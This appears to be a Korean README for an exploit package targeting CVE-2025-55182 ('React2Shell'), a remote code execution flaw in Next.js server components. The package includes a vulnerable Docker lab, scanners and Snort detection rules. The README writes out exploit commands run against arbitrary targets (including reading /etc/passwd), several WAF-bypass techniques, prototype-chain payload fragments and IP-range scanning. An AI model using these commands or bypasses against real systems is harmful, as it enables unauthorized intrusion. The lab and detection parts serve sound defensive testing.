Share
## https://sploitus.com/exploit?id=658EF8D0-E065-55B6-B956-B180D4DF6B4E
# CVE-2025-55182 (React2Shell) ํ•ต์‹ฌ ํŒจํ‚ค์ง€

## ๐Ÿ“ฆ ํฌํ•จ ํŒŒ์ผ

### 1. ์ทจ์•ฝํ•œ Docker ์ด๋ฏธ์ง€
- **docker-compose.yml** - ์ทจ์•ฝํ•œ Next.js ์•ฑ ์‹คํ–‰ ํ™˜๊ฒฝ
  ```bash
  docker-compose up -d
  # http://localhost:3000 ์—์„œ ์‹คํ–‰๋จ
  ```

### 2. ๊ณต๊ฒฉ ๋„๊ตฌ (POC)
- **exploit_advanced.py** - ๊ณ ๊ธ‰ ์ต์Šคํ”Œ๋กœ์ž‡ (ejpir ๊ธฐ๋ฒ•, WAF ์šฐํšŒ)
  ```bash
  # ๊ธฐ๋ณธ ๊ณต๊ฒฉ
  python3 exploit_advanced.py -u http://target.com -c "whoami" --basic
  
  # ๊ณ ๊ธ‰ ๊ณต๊ฒฉ (์ž๊ธฐ ์ฐธ์กฐ thenable + fake _response)
  python3 exploit_advanced.py -u http://target.com -c "id" --advanced
  
  # WAF ์šฐํšŒ (Unicode ์ธ์ฝ”๋”ฉ)
  python3 exploit_advanced.py -u http://target.com -c "cat /etc/passwd" --advanced --waf-bypass
  
  # ์˜ค๋ฒ„์‚ฌ์ด์ฆˆ ๊ณต๊ฒฉ (AWS WAF ํฌ๊ธฐ ์ œํ•œ ์šฐํšŒ)
  python3 exploit_advanced.py -u http://target.com -c "whoami" --oversize 65536
  
  # ์ฒญํฌ ์ „์†ก (๋ถ„์‚ฐ ํŒจํ„ด ๋ฐฐ์น˜๋กœ WAF ์šฐํšŒ)
  python3 exploit_advanced.py -u http://target.com -c "whoami" --chunked
  
  # ๋ชจ๋“  ๋ฐฉ๋ฒ• ์‹œ๋„
  python3 exploit_advanced.py -u http://target.com -c "id" --all -v
  ```

### 3. ์ง„๋‹จ ๋„๊ตฌ
- **rsc_vulnerability_checker.py** - ๋‹จ์ผ ํƒ€๊ฒŸ ์ง„๋‹จ ๋„๊ตฌ
  ```bash
  python3 rsc_vulnerability_checker.py http://localhost:3000
  ```

- **rsc_vulnerability_checker_multi.py** - ๋ฉ€ํ‹ฐ ํƒ€๊ฒŸ ์ง„๋‹จ ๋„๊ตฌ
  ```bash
  # ์—ฌ๋Ÿฌ URL ์Šค์บ”
  python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com
  
  # ํŒŒ์ผ์—์„œ URL ์ฝ๊ธฐ
  python3 rsc_vulnerability_checker_multi.py -f targets.txt -o result.csv
  
  # IP ๋ฒ”์œ„ ์Šค์บ”
  python3 rsc_vulnerability_checker_multi.py -r 192.168.1.1-254 -p 3000 --threads 20
  ```

### 4. Snort ํƒ์ง€ ๋ฃฐ
- **rules_priority_based** - ์šฐ์„ ์ˆœ์œ„ ๊ธฐ๋ฐ˜ Snort ๋ฃฐ์…‹
  - P0 (SID 2000xxx): ํ™•์ • ์•…์„ฑ ํŒจํ„ด - ์ฆ‰์‹œ ์ฐจ๋‹จ
  - P1 (SID 2001xx): ์•…์„ฑ ๊ฐ€๋Šฅ์„ฑ ๋†’์Œ - ๊ด€์ œ ๊ฒ€ํ†  ํ•„์š”
  - P2 (SID 2002xx): ์˜์‹ฌ ๋‹จ๊ณ„ - ํ™˜๊ฒฝ ์˜์กด์ 
  ```bash
  snort -c snort.conf -r attack.pcap -A console
  ```

## ๐Ÿš€ ๋น ๋ฅธ ์‹œ์ž‘ ๊ฐ€์ด๋“œ

### 1๋‹จ๊ณ„: ์ทจ์•ฝํ•œ ํ™˜๊ฒฝ ๊ตฌ์ถ•
```bash
docker-compose up -d
# http://localhost:3000 ์ ‘์† ํ™•์ธ
```

### 2๋‹จ๊ณ„: ์ง„๋‹จ ์‹คํ–‰
```bash
# ๋‹จ์ผ ์ง„๋‹จ
python3 rsc_vulnerability_checker.py http://localhost:3000

# ๋ฉ€ํ‹ฐ ์ง„๋‹จ
python3 rsc_vulnerability_checker_multi.py http://localhost:3000
```

### 3๋‹จ๊ณ„: ๊ณต๊ฒฉ ํ…Œ์ŠคํŠธ
```bash
# ๊ธฐ๋ณธ ๊ณต๊ฒฉ
python3 exploit_advanced.py -u http://localhost:3000 -c "whoami" --basic

# ๊ณ ๊ธ‰ ๊ณต๊ฒฉ (๋ชจ๋“  ๋ฐฉ๋ฒ• ์‹œ๋„)
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --all -v

# ์ฒญํฌ ์ „์†ก ๊ณต๊ฒฉ (WAF ์šฐํšŒ)
python3 exploit_advanced.py -u http://localhost:3000 -c "uname -a" --chunked -v
```

### 4๋‹จ๊ณ„: ๋„คํŠธ์›Œํฌ ํŠธ๋ž˜ํ”ฝ ์บก์ฒ˜ ๋ฐ ๋ถ„์„
```bash
# tcpdump๋กœ ์บก์ฒ˜
sudo tcpdump -i lo0 -w attack.pcap port 3000

# Snort๋กœ ๋ถ„์„
snort -c snort.conf -r attack.pcap -A console -k none
```

## ๐Ÿ“Š ๊ณต๊ฒฉ ๊ธฐ๋ฒ• ๋น„๊ต

| ๊ณต๊ฒฉ ๋ฐฉ์‹ | WAF ์šฐํšŒ | ๋‚œ์ด๋„ | ํƒ์ง€ ํšŒํ”ผ | ์šฉ๋„ |
|----------|----------|--------|----------|------|
| Basic | โŒ | โญ | ๋‚ฎ์Œ | ๊ต์œก, ๊ธฐ๋ณธ ํ…Œ์ŠคํŠธ |
| Advanced (thenable) | โœ… (Unicode) | โญโญโญ | ๋†’์Œ | ์‹ค์ „, WAF ํ™˜๊ฒฝ |
| Chunked | โœ… (๋ถ„์‚ฐ) | โญโญ | ๋งค์šฐ ๋†’์Œ | ํŒจํ„ด ๋งค์นญ ์šฐํšŒ |
| Oversize | โœ… (ํฌ๊ธฐ) | โญโญ | ๋†’์Œ | AWS WAF ์šฐํšŒ |

## ๐ŸŽฏ ๊ณ ๊ธ‰ ๊ธฐ๋ฒ• ์„ค๋ช…

### exploit_advanced.py ์ฃผ์š” ๊ธฐ๋ฒ•
- **์ž๊ธฐ ์ฐธ์กฐ thenable**: `then: "$1:__proto__:then"` - Chunk.prototype.then ํŠธ๋ฆฌ๊ฑฐ
- **fake _response ์ฃผ์ž…**: ๊ณต๊ฒฉ์ž ์ œ์–ด ์˜์—ญ ํ™•๋Œ€
- **$B ํ•ธ๋“ค๋Ÿฌ ์ฒด์ธ**: response._formData.get(response._prefix + id) ์•…์šฉ
- **ํ”„๋กœํ† ํƒ€์ž… ์ฒด์ธ ์ˆœํšŒ**: `$1:constructor:constructor` โ†’ Function ์ ‘๊ทผ
- **WAF ์šฐํšŒ ๊ธฐ๋ฒ•**:
  - **Unicode ์ธ์ฝ”๋”ฉ**: `constructor` โ†’ `\u0063onstructor`
  - **Oversize ํŽ˜์ด๋กœ๋“œ**: 8-64KB ํŒจ๋”ฉ์œผ๋กœ AWS WAF ๊ฒ€์‚ฌ ์˜์—ญ ์šฐํšŒ
  - **Chunked Transfer**: ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ž‘์€ ์ฒญํฌ๋กœ ๋ถ„ํ• ํ•˜์—ฌ ํŒจํ„ด ๋งค์นญ ํšŒํ”ผ

## ๐Ÿš€ ๋น ๋ฅธ ์‹œ์ž‘ ๊ฐ€์ด๋“œ

### 3๋‹จ๊ณ„: ์ง„๋‹จ ๋„๊ตฌ ์‹คํ–‰
```bash
python3 rsc_vulnerability_checker.py http://localhost:3000
```

### 4๋‹จ๊ณ„: Snort ํƒ์ง€ ํ…Œ์ŠคํŠธ
```bash
# PCAP ์บก์ฒ˜
sudo tcpdump -i lo0 -w attack.pcap 'port 3000' &
python3 exploit.py -c "whoami"
sudo pkill tcpdump

# Snort ๋ถ„์„
snort -r attack.pcap -c snort.conf -A console
```

## ๐Ÿ“‹ ํ•„์ˆ˜ ์š”๊ตฌ์‚ฌํ•ญ

- Docker & Docker Compose
- Python 3.8+
- requests ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ (`pip install requests`)
- Snort 2.9+ (ํƒ์ง€ ๋ฃฐ ํ…Œ์ŠคํŠธ์šฉ, ์„ ํƒ์‚ฌํ•ญ)